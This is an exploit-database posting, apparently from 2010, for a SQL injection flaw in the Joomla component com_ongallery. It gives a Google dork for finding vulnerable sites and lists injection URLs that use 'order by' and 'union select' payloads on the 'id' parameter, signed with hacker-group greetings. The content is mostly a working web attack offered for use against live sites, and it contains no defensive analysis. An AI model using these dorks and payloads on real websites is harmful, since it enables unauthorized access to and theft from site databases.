Joomla! Component com_ongallery - SQL Injection



EKU-ID: 21094 CVE: OSVDB-67206 OSVDB-ID:
Author: al bayraqim Published: 2010-08-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================

Author :   _aL_Bayraqim_

Homepage : http://www.1923turk.com

BORDO BERELİLER GRUP KOMUTANLIGI

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mü cahit...!

===================================================
  [+]G00gle Dork :index.php?option=com_ongallery

[+] Vulnerable File :


http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]


[+] ExploiT :

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--


===================================================
ŞeHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen LeşLer, SiZi Kim DiRiLTecek?..
===================================================

Greetz : 1923Turk All Users